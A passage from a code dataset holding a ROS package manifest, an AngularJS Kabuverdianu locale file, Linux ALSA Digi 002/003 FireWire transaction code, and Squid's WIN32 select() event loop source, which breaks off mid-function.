text
stringlengths 2
100k
| meta
dict |
---|---|
<!-- ROS catkin manifest for the msg_conversions package: converts Astrobee
     Flight Software (FF) messages into standard ROS messages that can be
     visualized in rviz.  build_depend/run_depend pairs mirror each other
     for every message package used. -->
<package>
  <name>msg_conversions</name>
  <version>1.0.0</version>
  <description>
    This package converts FF msgs to standard messages visualizable in rviz.
  </description>
  <license>
    Apache License, Version 2.0
  </license>
  <author email="[email protected]">
    Astrobee Flight Software
  </author>
  <maintainer email="[email protected]">
    Astrobee Flight Software
  </maintainer>
  <buildtool_depend>catkin</buildtool_depend>
  <build_depend>roscpp</build_depend>
  <build_depend>std_msgs</build_depend>
  <build_depend>sensor_msgs</build_depend>
  <build_depend>geometry_msgs</build_depend>
  <build_depend>ff_msgs</build_depend>
  <run_depend>roscpp</run_depend>
  <run_depend>message_runtime</run_depend>
  <run_depend>std_msgs</run_depend>
  <run_depend>sensor_msgs</run_depend>
  <run_depend>geometry_msgs</run_depend>
  <run_depend>ff_msgs</run_depend>
</package>
| {
"pile_set_name": "Github"
} |
// AngularJS locale module for Kabuverdianu (Cape Verde), locale id "kea-cv".
'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
// Plural category names as defined by the CLDR plural rules.
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
// Count the digits after the decimal point in the string form of n.
// Returns 0 when n has no fractional part.
function getDecimals(n) {
  var str = '' + n;
  var dot = str.indexOf('.');
  if (dot === -1) {
    return 0;
  }
  return str.length - dot - 1;
}
// Resolve the "visible fraction" operands used by CLDR plural rules:
// v = number of visible fraction digits (capped at 3 unless an explicit
// precision is given), f = those fraction digits as an integer.
function getVF(n, opt_precision) {
  var precision = (opt_precision === undefined)
      ? Math.min(getDecimals(n), 3)
      : opt_precision;
  var scale = Math.pow(10, precision);
  return {v: precision, f: ((n * scale) | 0) % scale};
}
// Register the $locale service value for kea-cv: date/time names and
// formats, number/currency patterns, and the CLDR plural rule
// (ONE only for integer 1 with no visible fraction digits).
$provide.value("$locale", {
  "DATETIME_FORMATS": {
    "AMPMS": [
      "am",
      "pm"
    ],
    "DAY": [
      "dumingu",
      "sigunda-fera",
      "tersa-fera",
      "kuarta-fera",
      "kinta-fera",
      "sesta-fera",
      "sabadu"
    ],
    "ERANAMES": [
      "Antis di Kristu",
      "Dispos di Kristu"
    ],
    "ERAS": [
      "AK",
      "DK"
    ],
    "FIRSTDAYOFWEEK": 0,
    "MONTH": [
      "Janeru",
      "Febreru",
      "Marsu",
      "Abril",
      "Maiu",
      "Junhu",
      "Julhu",
      "Agostu",
      "Setenbru",
      "Otubru",
      "Nuvenbru",
      "Dizenbru"
    ],
    "SHORTDAY": [
      "dum",
      "sig",
      "ter",
      "kua",
      "kin",
      "ses",
      "sab"
    ],
    "SHORTMONTH": [
      "Jan",
      "Feb",
      "Mar",
      "Abr",
      "Mai",
      "Jun",
      "Jul",
      "Ago",
      "Set",
      "Otu",
      "Nuv",
      "Diz"
    ],
    "STANDALONEMONTH": [
      "Janeru",
      "Febreru",
      "Marsu",
      "Abril",
      "Maiu",
      "Junhu",
      "Julhu",
      "Agostu",
      "Setenbru",
      "Otubru",
      "Nuvenbru",
      "Dizenbru"
    ],
    "WEEKENDRANGE": [
      5,
      6
    ],
    "fullDate": "EEEE, d 'di' MMMM 'di' y",
    "longDate": "d 'di' MMMM 'di' y",
    "medium": "d MMM y HH:mm:ss",
    "mediumDate": "d MMM y",
    "mediumTime": "HH:mm:ss",
    "short": "d/M/y HH:mm",
    "shortDate": "d/M/y",
    "shortTime": "HH:mm"
  },
  "NUMBER_FORMATS": {
    "CURRENCY_SYM": "CVE",
    "DECIMAL_SEP": ",",
    "GROUP_SEP": "\u00a0",
    "PATTERNS": [
      {
        "gSize": 3,
        "lgSize": 3,
        "maxFrac": 3,
        "minFrac": 0,
        "minInt": 1,
        "negPre": "-",
        "negSuf": "",
        "posPre": "",
        "posSuf": ""
      },
      {
        "gSize": 3,
        "lgSize": 3,
        "maxFrac": 2,
        "minFrac": 2,
        "minInt": 1,
        "negPre": "-",
        "negSuf": "\u00a0\u00a4",
        "posPre": "",
        "posSuf": "\u00a0\u00a4"
      }
    ]
  },
  "id": "kea-cv",
  "localeID": "kea_CV",
  "pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]);
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0-only
/*
* digi00x-transaction.c - a part of driver for Digidesign Digi 002/003 family
*
* Copyright (c) 2014-2015 Takashi Sakamoto
*/
#include <sound/asound.h>
#include "digi00x.h"
/*
 * Store an asynchronous message quadlet from the unit and wake any
 * hwdep reader waiting for it.  The spinlock serializes access to
 * dg00x->msg with the hwdep interface.
 */
static void handle_unknown_message(struct snd_dg00x *dg00x,
				   unsigned long long offset, __be32 *buf)
{
	unsigned long irq_flags;

	spin_lock_irqsave(&dg00x->lock, irq_flags);
	dg00x->msg = be32_to_cpu(*buf);
	spin_unlock_irqrestore(&dg00x->lock, irq_flags);

	wake_up(&dg00x->hwdep_wait);
}
/*
 * FireWire address handler callback: every request is acknowledged
 * immediately, then writes landing at our registered offset are
 * forwarded to handle_unknown_message().
 */
static void handle_message(struct fw_card *card, struct fw_request *request,
			   int tcode, int destination, int source,
			   int generation, unsigned long long offset,
			   void *data, size_t length, void *callback_data)
{
	struct snd_dg00x *dg00x = callback_data;
	__be32 *quadlet = data;

	fw_send_response(card, request, RCODE_COMPLETE);

	if (offset == dg00x->async_handler.offset)
		handle_unknown_message(dg00x, offset, quadlet);
}
/*
 * Program the unit with the 1394 address where it should post
 * asynchronous messages.  The name suggests this is re-run after bus
 * resets, when the node id can change — TODO confirm against callers.
 * Returns 0 or a negative error code from snd_fw_transaction().
 */
int snd_dg00x_transaction_reregister(struct snd_dg00x *dg00x)
{
	struct fw_device *device = fw_parent_device(dg00x->unit);
	__be32 data[2];

	/* Unknown. 4bytes. */
	/* Upper quadlet: node id in bits 31..16 ORed with the top bits of
	 * the handler offset (offset >> 32); lower quadlet: the low 32
	 * bits of the offset (cpu_to_be32 truncates intentionally). */
	data[0] = cpu_to_be32((device->card->node_id << 16) |
			      (dg00x->async_handler.offset >> 32));
	data[1] = cpu_to_be32(dg00x->async_handler.offset);

	return snd_fw_transaction(dg00x->unit, TCODE_WRITE_BLOCK_REQUEST,
				  DG00X_ADDR_BASE + DG00X_OFFSET_MESSAGE_ADDR,
				  &data, sizeof(data), 0);
}
/*
 * Tear down the asynchronous message handler.  callback_data doubles
 * as the "registered" flag, so calling this twice is harmless.
 */
void snd_dg00x_transaction_unregister(struct snd_dg00x *dg00x)
{
	if (!dg00x->async_handler.callback_data)
		return;

	fw_core_remove_address_handler(&dg00x->async_handler);

	dg00x->async_handler.callback_data = NULL;
}
/*
 * Register an address handler for asynchronous messages from the unit,
 * then tell the unit where to write them.  If the latter fails, the
 * handler is unregistered again so no half-registered state remains.
 * Returns 0 or a negative error code.
 */
int snd_dg00x_transaction_register(struct snd_dg00x *dg00x)
{
	/* The core assigns us some sub-range of this region. */
	static const struct fw_address_region resp_register_region = {
		.start = 0xffffe0000000ull,
		.end = 0xffffe000ffffull,
	};
	int err;

	/* The unit writes a single quadlet (4 bytes) per message. */
	dg00x->async_handler.length = 4;
	dg00x->async_handler.address_callback = handle_message;
	dg00x->async_handler.callback_data = dg00x;

	err = fw_core_add_address_handler(&dg00x->async_handler,
					  &resp_register_region);
	if (err < 0)
		return err;

	/* Roll back the handler if the unit could not be programmed. */
	err = snd_dg00x_transaction_reregister(dg00x);
	if (err < 0)
		snd_dg00x_transaction_unregister(dg00x);

	return err;
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 1996-2020 The Squid Software Foundation and contributors
*
* Squid software is distributed under GPLv2+ license and includes
* contributions from numerous individuals and organizations.
* Please see the COPYING and CONTRIBUTORS files for details.
*/
/* DEBUG: section 05 Socket Functions */
#include "squid.h"
#if USE_SELECT_WIN32
#include "anyp/PortCfg.h"
#include "comm/Connection.h"
#include "comm/Loops.h"
#include "fde.h"
#include "ICP.h"
#include "mgr/Registration.h"
#include "SquidTime.h"
#include "StatCounters.h"
#include "StatHist.h"
#include "Store.h"
#include <cerrno>
static int MAX_POLL_TIME = 1000; /* see also Comm::QuickPollRequired() */
#ifndef howmany
#define howmany(x, y) (((x)+((y)-1))/(y))
#endif
#ifndef NBBY
#define NBBY 8
#endif
#define FD_MASK_BYTES sizeof(fd_mask)
#define FD_MASK_BITS (FD_MASK_BYTES*NBBY)
/* STATIC */
static int examine_select(fd_set *, fd_set *);
static int fdIsTcpListener(int fd);
static int fdIsUdpListener(int fd);
static int fdIsDns(int fd);
static OBJH commIncomingStats;
static int comm_check_incoming_select_handlers(int nfds, int *fds);
static void comm_select_dns_incoming(void);
static void commUpdateReadBits(int fd, PF * handler);
static void commUpdateWriteBits(int fd, PF * handler);
static struct timeval zero_tv;
static fd_set global_readfds;
static fd_set global_writefds;
static int nreadfds;
static int nwritefds;
/*
* Automatic tuning for incoming requests:
*
* INCOMING sockets are the ICP and HTTP ports. We need to check these
* fairly regularly, but how often? When the load increases, we
* want to check the incoming sockets more often. If we have a lot
* of incoming ICP, then we need to check these sockets more than
* if we just have HTTP.
*
* The variables 'incoming_udp_interval' and 'incoming_tcp_interval'
* determine how many normal I/O events to process before checking
* incoming sockets again. Note we store the incoming_interval
* multiplied by a factor of (2^INCOMING_FACTOR) to have some
* pseudo-floating point precision.
*
 * The variables 'udp_io_events' and 'tcp_io_events' count how many normal
 * I/O events have been processed since the last check on the incoming
 * sockets. When io_events > incoming_interval, it's time to check incoming
 * sockets.
*
* Every time we check incoming sockets, we count how many new messages
* or connections were processed. This is used to adjust the
* incoming_interval for the next iteration. The new incoming_interval
* is calculated as the current incoming_interval plus what we would
* like to see as an average number of events minus the number of
* events just processed.
*
* incoming_interval = incoming_interval + target_average - number_of_events_processed
*
* There are separate incoming_interval counters for DNS, UDP and TCP events
*
* You can see the current values of the incoming_interval's, as well as
* a histogram of 'incoming_events' by asking the cache manager
* for 'comm_incoming', e.g.:
*
* % ./client mgr:comm_incoming
*
* Caveats:
*
* - We have MAX_INCOMING_INTEGER as a magic upper limit on
* incoming_interval for both types of sockets. At the
* largest value the cache will effectively be idling.
*
* - The higher the INCOMING_FACTOR, the slower the algorithm will
* respond to load spikes/increases/decreases in demand. A value
* between 3 and 8 is recommended.
*/
#define MAX_INCOMING_INTEGER 256
#define INCOMING_FACTOR 5
#define MAX_INCOMING_INTERVAL (MAX_INCOMING_INTEGER << INCOMING_FACTOR)
static int udp_io_events = 0;
static int dns_io_events = 0;
static int tcp_io_events = 0;
static int incoming_udp_interval = 16 << INCOMING_FACTOR;
static int incoming_dns_interval = 16 << INCOMING_FACTOR;
static int incoming_tcp_interval = 16 << INCOMING_FACTOR;
#define commCheckUdpIncoming (++udp_io_events > (incoming_udp_interval>> INCOMING_FACTOR))
#define commCheckDnsIncoming (++dns_io_events > (incoming_dns_interval>> INCOMING_FACTOR))
#define commCheckTcpIncoming (++tcp_io_events > (incoming_tcp_interval>> INCOMING_FACTOR))
/*
 * Arm or disarm read and/or write interest on fd.  'type' is a bitmask
 * of COMM_SELECT_READ / COMM_SELECT_WRITE; a NULL handler clears the
 * corresponding interest.  A non-zero 'timeout' (seconds) also refreshes
 * the FD's inactivity deadline.
 */
void
Comm::SetSelect(int fd, unsigned int type, PF * handler, void *client_data, time_t timeout)
{
    /* Validate fd before it is used to index fd_table: the original
     * computed &fd_table[fd] first, indexing with an unchecked value. */
    assert(fd >= 0);

    fde *F = &fd_table[fd];

    /* Only an open FD may gain handlers; a closed one may only be cleared. */
    assert(F->flags.open || (!handler && !client_data && !timeout));

    debugs(5, 5, HERE << "FD " << fd << ", type=" << type <<
           ", handler=" << handler << ", client_data=" << client_data <<
           ", timeout=" << timeout);

    if (type & COMM_SELECT_READ) {
        F->read_handler = handler;
        F->read_data = client_data;
        commUpdateReadBits(fd, handler);
    }

    if (type & COMM_SELECT_WRITE) {
        F->write_handler = handler;
        F->write_data = client_data;
        commUpdateWriteBits(fd, handler);
    }

    if (timeout)
        F->timeout = squid_curtime + timeout;
}
/// Whether fd belongs to one of the ICP (UDP) sockets.
static int
fdIsUdpListener(int fd)
{
    const bool incoming = icpIncomingConn != NULL && icpIncomingConn->fd == fd;
    const bool outgoing = icpOutgoingConn != NULL && icpOutgoingConn->fd == fd;
    return (incoming || outgoing) ? 1 : 0;
}
/// Whether fd is one of the internal DNS resolver sockets.
static int
fdIsDns(int fd)
{
    return (fd == DnsSocketA || fd == DnsSocketB) ? 1 : 0;
}
static int
fdIsTcpListener(int fd)
{
for (AnyP::PortCfgPointer s = HttpPortList; s != NULL; s = s->next) {
if (s->listenConn != NULL && s->listenConn->fd == fd)
return 1;
}
return 0;
}
/*
 * Zero-timeout select() over the given set of incoming sockets,
 * dispatching any armed read/write handlers.  Handlers are one-shot:
 * they are cleared before being invoked.  Returns -1 when none of the
 * fds has a handler armed (the caller should ignore the result);
 * otherwise the value of incoming_sockets_accepted accumulated by the
 * dispatched handlers.
 */
static int
comm_check_incoming_select_handlers(int nfds, int *fds)
{
    int i;
    int fd;
    int maxfd = 0;
    PF *hdl = NULL;
    fd_set read_mask;
    fd_set write_mask;
    FD_ZERO(&read_mask);
    FD_ZERO(&write_mask);
    incoming_sockets_accepted = 0;

    /* Build the select masks from fds that currently have handlers. */
    for (i = 0; i < nfds; ++i) {
        fd = fds[i];

        if (fd_table[fd].read_handler) {
            FD_SET(fd, &read_mask);

            if (fd > maxfd)
                maxfd = fd;
        }

        if (fd_table[fd].write_handler) {
            FD_SET(fd, &write_mask);

            if (fd > maxfd)
                maxfd = fd;
        }
    }

    /* No handler anywhere: report the -1 sentinel.  Note the
     * post-increment: when non-zero, maxfd becomes the exclusive
     * bound select() expects. */
    if (maxfd++ == 0)
        return -1;

    getCurrentTime();

    ++ statCounter.syscalls.selects;

    /* Non-blocking poll (zero_tv); on error or nothing ready, return
     * whatever the (empty) dispatch produced. */
    if (select(maxfd, &read_mask, &write_mask, NULL, &zero_tv) < 1)
        return incoming_sockets_accepted;

    /* Dispatch ready handlers; clear each before calling (one-shot). */
    for (i = 0; i < nfds; ++i) {
        fd = fds[i];

        if (FD_ISSET(fd, &read_mask)) {
            if ((hdl = fd_table[fd].read_handler) != NULL) {
                fd_table[fd].read_handler = NULL;
                commUpdateReadBits(fd, NULL);
                hdl(fd, fd_table[fd].read_data);
            } else {
                debugs(5, DBG_IMPORTANT, "comm_select_incoming: FD " << fd << " NULL read handler");
            }
        }

        if (FD_ISSET(fd, &write_mask)) {
            if ((hdl = fd_table[fd].write_handler) != NULL) {
                fd_table[fd].write_handler = NULL;
                commUpdateWriteBits(fd, NULL);
                hdl(fd, fd_table[fd].write_data);
            } else {
                debugs(5, DBG_IMPORTANT, "comm_select_incoming: FD " << fd << " NULL write handler");
            }
        }
    }

    return incoming_sockets_accepted;
}
/*
 * Poll the ICP (UDP) sockets for ready handlers and retune
 * incoming_udp_interval from the number of events just serviced.
 */
static void
comm_select_udp_incoming(void)
{
    int nfds = 0;
    int fds[2];
    int nevents;
    udp_io_events = 0;

    if (Comm::IsConnOpen(icpIncomingConn)) {
        fds[nfds] = icpIncomingConn->fd;
        ++nfds;
    }

    if (Comm::IsConnOpen(icpOutgoingConn) && icpIncomingConn != icpOutgoingConn) {
        fds[nfds] = icpOutgoingConn->fd;
        ++nfds;
    }

    if (nfds == 0)
        return;

    nevents = comm_check_incoming_select_handlers(nfds, fds);

    /* A negative result means no handlers were armed; do not let the
     * sentinel skew the interval tuning or enter the histogram
     * (matches the guard in comm_select_dns_incoming()). */
    if (nevents < 0)
        return;

    incoming_udp_interval += Config.comm_incoming.udp.average - nevents;

    if (incoming_udp_interval < 0)
        incoming_udp_interval = 0;

    if (incoming_udp_interval > MAX_INCOMING_INTERVAL)
        incoming_udp_interval = MAX_INCOMING_INTERVAL;

    if (nevents > INCOMING_UDP_MAX)
        nevents = INCOMING_UDP_MAX;

    statCounter.comm_udp_incoming.count(nevents);
}
/*
 * Poll the HTTP listening (TCP) sockets for ready handlers and retune
 * incoming_tcp_interval from the number of events just serviced.
 */
static void
comm_select_tcp_incoming(void)
{
    int nfds = 0;
    int fds[MAXTCPLISTENPORTS];
    int nevents;
    tcp_io_events = 0;

    // XXX: only poll sockets that won't be deferred. But how do we identify them?

    for (AnyP::PortCfgPointer s = HttpPortList; s != NULL; s = s->next) {
        if (Comm::IsConnOpen(s->listenConn)) {
            fds[nfds] = s->listenConn->fd;
            ++nfds;
        }
    }

    /* Nothing to poll (no listeners open); the UDP/DNS twins have the
     * same early-out before calling the checker. */
    if (nfds == 0)
        return;

    nevents = comm_check_incoming_select_handlers(nfds, fds);

    /* A negative result means no handlers were armed; do not let the
     * sentinel skew the interval tuning or enter the histogram
     * (matches the guard in comm_select_dns_incoming()). */
    if (nevents < 0)
        return;

    incoming_tcp_interval += Config.comm_incoming.tcp.average - nevents;

    if (incoming_tcp_interval < 0)
        incoming_tcp_interval = 0;

    if (incoming_tcp_interval > MAX_INCOMING_INTERVAL)
        incoming_tcp_interval = MAX_INCOMING_INTERVAL;

    if (nevents > INCOMING_TCP_MAX)
        nevents = INCOMING_TCP_MAX;

    statCounter.comm_tcp_incoming.count(nevents);
}
#define DEBUG_FDBITS 0
/* Select on all sockets; call handlers for those that are ready. */
/*
 * Run one pass of the WIN32 select() event loop: wait up to 'msec'
 * milliseconds (capped by MAX_POLL_TIME) for readiness on all FDs with
 * registered interest, then dispatch the one-shot read/write handlers
 * of every ready or read-pending descriptor.
 *
 * Returns Comm::OK after handlers were dispatched, Comm::SHUTDOWN when
 * no FD has interest while shutting down, Comm::COMM_ERROR on an
 * unexpected select() failure, or Comm::TIMEOUT when nothing became
 * ready before the deadline.
 *
 * Winsock specifics: an fd_set is an array of SOCKET handles
 * (fd_count / fd_array), so each ready handle must be mapped back to a
 * Squid FD number by scanning fd_table for a matching win32.handle.
 */
Comm::Flag
Comm::DoSelect(int msec)
{
    fd_set readfds;
    fd_set pendingfds;
    fd_set writefds;

    PF *hdl = NULL;
    int fd;
    int maxfd;
    int num;
    int pending;
    int calldns = 0, calludp = 0, calltcp = 0;
    int j;
#if DEBUG_FDBITS
    int i;
#endif
    struct timeval poll_time;
    double timeout = current_dtime + (msec / 1000.0);
    fde *F;
    int no_bits;
    fd_set errfds;
    FD_ZERO(&errfds);

    do {
        double start;
        getCurrentTime();
        start = current_dtime;

        /* Service incoming sockets first if their counters say so. */
        if (commCheckUdpIncoming)
            comm_select_udp_incoming();

        if (commCheckDnsIncoming)
            comm_select_dns_incoming();

        if (commCheckTcpIncoming)
            comm_select_tcp_incoming();

        calldns = calludp = calltcp = 0;

        maxfd = Biggest_FD + 1;

        /* Snapshot the global interest sets for this select() call. */
        memcpy(&readfds, &global_readfds, sizeof(global_readfds));

        memcpy(&writefds, &global_writefds, sizeof(global_writefds));

        /* NOTE(review): errfds starts as a copy of the write set —
         * presumably because Winsock reports failed non-blocking
         * connect()s via exceptfds; confirm against Winsock docs. */
        memcpy(&errfds, &global_writefds, sizeof(global_writefds));

        /* remove stalled FDs, and deal with pending descriptors */
        pending = 0;

        FD_ZERO(&pendingfds);

        /* Map each read-interest handle back to its FD; FDs with data
         * already buffered (read_pending) are collected so select()
         * can be called with a zero timeout below. */
        for (j = 0; j < (int) readfds.fd_count; ++j) {
            register int readfds_handle = readfds.fd_array[j];
            no_bits = 1;

            for ( fd = Biggest_FD; fd; --fd ) {
                if ( fd_table[fd].win32.handle == readfds_handle ) {
                    if (fd_table[fd].flags.open) {
                        no_bits = 0;
                        break;
                    }
                }
            }

            if (no_bits)
                continue;

            if (FD_ISSET(fd, &readfds) && fd_table[fd].flags.read_pending) {
                FD_SET(fd, &pendingfds);
                ++pending;
            }
        }

#if DEBUG_FDBITS
        /* NOTE(review): dead code while DEBUG_FDBITS is 0; FD_ISSET is
         * passed the fd_set by value here, unlike every live call site
         * which passes &readfds — looks like it needs '&' to compile. */
        for (i = 0; i < maxfd; ++i) {
            /* Check each open socket for a handler. */
            if (fd_table[i].read_handler) {
                assert(FD_ISSET(i, readfds));
            }

            if (fd_table[i].write_handler) {
                assert(FD_ISSET(i, writefds));
            }
        }
#endif

        /* Nobody is interested in anything: only sane while shutting down. */
        if (nreadfds + nwritefds == 0) {
            assert(shutting_down);
            return Comm::SHUTDOWN;
        }

        if (msec > MAX_POLL_TIME)
            msec = MAX_POLL_TIME;

        /* Buffered data exists; do not block in select() at all. */
        if (pending)
            msec = 0;

        /* Retry select() until it succeeds, reports pending work, or
         * fails with an error we cannot ignore. */
        for (;;) {
            poll_time.tv_sec = msec / 1000;
            poll_time.tv_usec = (msec % 1000) * 1000;
            ++ statCounter.syscalls.selects;
            num = select(maxfd, &readfds, &writefds, &errfds, &poll_time);
            int xerrno = errno;
            ++ statCounter.select_loops;

            if (num >= 0 || pending > 0)
                break;

            if (ignoreErrno(xerrno))
                break;

            debugs(5, DBG_CRITICAL, MYNAME << "WARNING: select failure: " << xstrerr(xerrno));

            examine_select(&readfds, &writefds);

            return Comm::COMM_ERROR;

            /* NOTREACHED */
        }

        if (num < 0 && !pending)
            continue;

        getCurrentTime();

        debugs(5, num ? 5 : 8, "comm_select: " << num << "+" << pending << " FDs ready");

        statCounter.select_fds_hist.count(num);

        if (num == 0 && pending == 0)
            continue;

        /* Scan return fd masks for ready descriptors */
        assert(readfds.fd_count <= (unsigned int) Biggest_FD);
        assert(pendingfds.fd_count <= (unsigned int) Biggest_FD);

        /* Dispatch read handlers for FDs that are ready or pending. */
        for (j = 0; j < (int) readfds.fd_count; ++j) {
            register int readfds_handle = readfds.fd_array[j];
            register int pendingfds_handle = pendingfds.fd_array[j];
            register int osfhandle;
            no_bits = 1;

            for ( fd = Biggest_FD; fd; --fd ) {
                osfhandle = fd_table[fd].win32.handle;

                if (( osfhandle == readfds_handle ) ||
                        ( osfhandle == pendingfds_handle )) {
                    if (fd_table[fd].flags.open) {
                        no_bits = 0;
                        break;
                    }
                }
            }

            if (no_bits)
                continue;

#if DEBUG_FDBITS
            debugs(5, 9, "FD " << fd << " bit set for reading");
            assert(FD_ISSET(fd, readfds));
#endif

            /* Incoming sockets are batched and serviced after the loop. */
            if (fdIsUdpListener(fd)) {
                calludp = 1;
                continue;
            }

            if (fdIsDns(fd)) {
                calldns = 1;
                continue;
            }

            if (fdIsTcpListener(fd)) {
                calltcp = 1;
                continue;
            }

            F = &fd_table[fd];
            debugs(5, 6, "comm_select: FD " << fd << " ready for reading");

            /* One-shot handler: clear before invoking. */
            if ((hdl = F->read_handler)) {
                F->read_handler = NULL;
                commUpdateReadBits(fd, NULL);
                hdl(fd, F->read_data);
                ++ statCounter.select_fds;

                if (commCheckUdpIncoming)
                    comm_select_udp_incoming();

                if (commCheckDnsIncoming)
                    comm_select_dns_incoming();

                if (commCheckTcpIncoming)
                    comm_select_tcp_incoming();
            }
        }

        assert(errfds.fd_count <= (unsigned int) Biggest_FD);

        /* FDs flagged in the exception set get their write handler
         * called so the pending operation can observe the error. */
        for (j = 0; j < (int) errfds.fd_count; ++j) {
            register int errfds_handle = errfds.fd_array[j];

            for ( fd = Biggest_FD; fd; --fd ) {
                if ( fd_table[fd].win32.handle == errfds_handle )
                    break;
            }

            if (fd_table[fd].flags.open) {
                F = &fd_table[fd];

                if ((hdl = F->write_handler)) {
                    F->write_handler = NULL;
                    commUpdateWriteBits(fd, NULL);
                    hdl(fd, F->write_data);
                    ++ statCounter.select_fds;
                }
            }
        }

        assert(writefds.fd_count <= (unsigned int) Biggest_FD);

        /* Dispatch write handlers for writable FDs. */
        for (j = 0; j < (int) writefds.fd_count; ++j) {
            register int writefds_handle = writefds.fd_array[j];
            no_bits = 1;

            for ( fd = Biggest_FD; fd; --fd ) {
                if ( fd_table[fd].win32.handle == writefds_handle ) {
                    if (fd_table[fd].flags.open) {
                        no_bits = 0;
                        break;
                    }
                }
            }

            if (no_bits)
                continue;

#if DEBUG_FDBITS
            debugs(5, 9, "FD " << fd << " bit set for writing");
            assert(FD_ISSET(fd, writefds));
#endif

            if (fdIsUdpListener(fd)) {
                calludp = 1;
                continue;
            }

            if (fdIsDns(fd)) {
                calldns = 1;
                continue;
            }

            if (fdIsTcpListener(fd)) {
                calltcp = 1;
                continue;
            }

            F = &fd_table[fd];
            debugs(5, 6, "comm_select: FD " << fd << " ready for writing");

            /* One-shot handler: clear before invoking. */
            if ((hdl = F->write_handler)) {
                F->write_handler = NULL;
                commUpdateWriteBits(fd, NULL);
                hdl(fd, F->write_data);
                ++ statCounter.select_fds;

                if (commCheckUdpIncoming)
                    comm_select_udp_incoming();

                if (commCheckDnsIncoming)
                    comm_select_dns_incoming();

                if (commCheckTcpIncoming)
                    comm_select_tcp_incoming();
            }
        }

        /* Service the incoming socket types flagged during dispatch. */
        if (calludp)
            comm_select_udp_incoming();

        if (calldns)
            comm_select_dns_incoming();

        if (calltcp)
            comm_select_tcp_incoming();

        getCurrentTime();

        statCounter.select_time += (current_dtime - start);

        return Comm::OK;
    } while (timeout > current_dtime);

    debugs(5, 8, "comm_select: time out: " << squid_curtime);

    return Comm::TIMEOUT;
}
/*
 * Poll the internal DNS resolver sockets for ready handlers and retune
 * incoming_dns_interval from the number of events just serviced.
 */
static void
comm_select_dns_incoming(void)
{
    int fds[3];
    int nfds = 0;

    dns_io_events = 0;

    if (DnsSocketA < 0 && DnsSocketB < 0)
        return;

    if (DnsSocketA >= 0)
        fds[nfds++] = DnsSocketA;

    if (DnsSocketB >= 0)
        fds[nfds++] = DnsSocketB;

    const int nevents = comm_check_incoming_select_handlers(nfds, fds);

    /* -1 means no handlers were armed; nothing to account for. */
    if (nevents < 0)
        return;

    incoming_dns_interval += Config.comm_incoming.dns.average - nevents;

    if (incoming_dns_interval < Config.comm_incoming.dns.min_poll)
        incoming_dns_interval = Config.comm_incoming.dns.min_poll;
    else if (incoming_dns_interval > MAX_INCOMING_INTERVAL)
        incoming_dns_interval = MAX_INCOMING_INTERVAL;

    int counted = nevents;

    if (counted > INCOMING_DNS_MAX)
        counted = INCOMING_DNS_MAX;

    statCounter.comm_dns_incoming.count(counted);
}
/*
 * One-time initialization for the select() loop: reset the interest
 * sets and counters, and register the cachemgr "comm_select_incoming"
 * report.
 */
void
Comm::SelectLoopInit(void)
{
    /* Zero timeout used by the incoming-socket polls. */
    zero_tv.tv_sec = 0;
    zero_tv.tv_usec = 0;

    nreadfds = 0;
    nwritefds = 0;

    FD_ZERO(&global_readfds);
    FD_ZERO(&global_writefds);

    Mgr::RegisterAction("comm_select_incoming",
                        "comm_incoming() stats",
                        commIncomingStats, 0, 1);
}
/*
* examine_select - debug routine.
*
 * I spent the day chasing this core dump that occurs when both the client
 * and the server side of a cache fetch simultaneously abort the
 * connection. While I haven't really studied the code to figure out how
 * it happens, the snippet below may prevent the cache from exiting:
*
* Call this from where the select loop fails.
*/
/*
 * Debug/recovery routine, called when select() itself fails: fstat()s
 * every FD that has read or write interest and forcibly tears down any
 * FD the OS no longer considers valid, so the main loop can continue.
 * Always returns 0.
 */
static int
examine_select(fd_set * readfds, fd_set * writefds)
{
    int fd = 0;
    fd_set read_x;
    fd_set write_x;

    struct timeval tv;
    AsyncCall::Pointer ch = NULL;
    fde *F = NULL;

    struct stat sb;
    debugs(5, DBG_CRITICAL, "examine_select: Examining open file descriptors...");

    for (fd = 0; fd < Squid_MaxFD; ++fd) {
        FD_ZERO(&read_x);
        FD_ZERO(&write_x);
        tv.tv_sec = tv.tv_usec = 0;

        /* Only inspect FDs that are in one of the interest sets. */
        if (FD_ISSET(fd, readfds))
            FD_SET(fd, &read_x);
        else if (FD_ISSET(fd, writefds))
            FD_SET(fd, &write_x);
        else
            continue;

        ++ statCounter.syscalls.selects;
        errno = 0;

        /* A successful fstat() is taken as "this FD is still valid". */
        if (!fstat(fd, &sb)) {
            debugs(5, 5, "FD " << fd << " is valid.");
            continue;
        }

        int xerrno = errno;
        F = &fd_table[fd];
        debugs(5, DBG_CRITICAL, "fstat(FD " << fd << "): " << xstrerr(xerrno));
        debugs(5, DBG_CRITICAL, "WARNING: FD " << fd << " has handlers, but it's invalid.");
        debugs(5, DBG_CRITICAL, "FD " << fd << " is a " << fdTypeStr[F->type] << " called '" << F->desc << "'");
        debugs(5, DBG_CRITICAL, "tmout:" << F->timeoutHandler << " read:" << F->read_handler << " write:" << F->write_handler);

        for (ch = F->closeHandler; ch != NULL; ch = ch->Next())
            debugs(5, DBG_CRITICAL, " close handler: " << ch);

        /* Prefer close handlers; fall back to the timeout handler. */
        if (F->closeHandler != NULL) {
            commCallCloseHandlers(fd);
        } else if (F->timeoutHandler != NULL) {
            debugs(5, DBG_CRITICAL, "examine_select: Calling Timeout Handler");
            ScheduleCallHere(F->timeoutHandler);
        }

        /* Drop every remaining reference to the dead FD. */
        F->closeHandler = NULL;
        F->timeoutHandler = NULL;
        F->read_handler = NULL;
        F->write_handler = NULL;
        FD_CLR(fd, readfds);
        FD_CLR(fd, writefds);
    }

    return 0;
}
/*
 * cachemgr action "comm_incoming": dumps the current (descaled by
 * INCOMING_FACTOR) incoming_*_interval tuning values followed by the
 * histograms of events handled per comm_select_*_incoming() call.
 */
static void
commIncomingStats(StoreEntry * sentry)
{
    storeAppendPrintf(sentry, "Current incoming_udp_interval: %d\n",
                      incoming_udp_interval >> INCOMING_FACTOR);
    storeAppendPrintf(sentry, "Current incoming_dns_interval: %d\n",
                      incoming_dns_interval >> INCOMING_FACTOR);
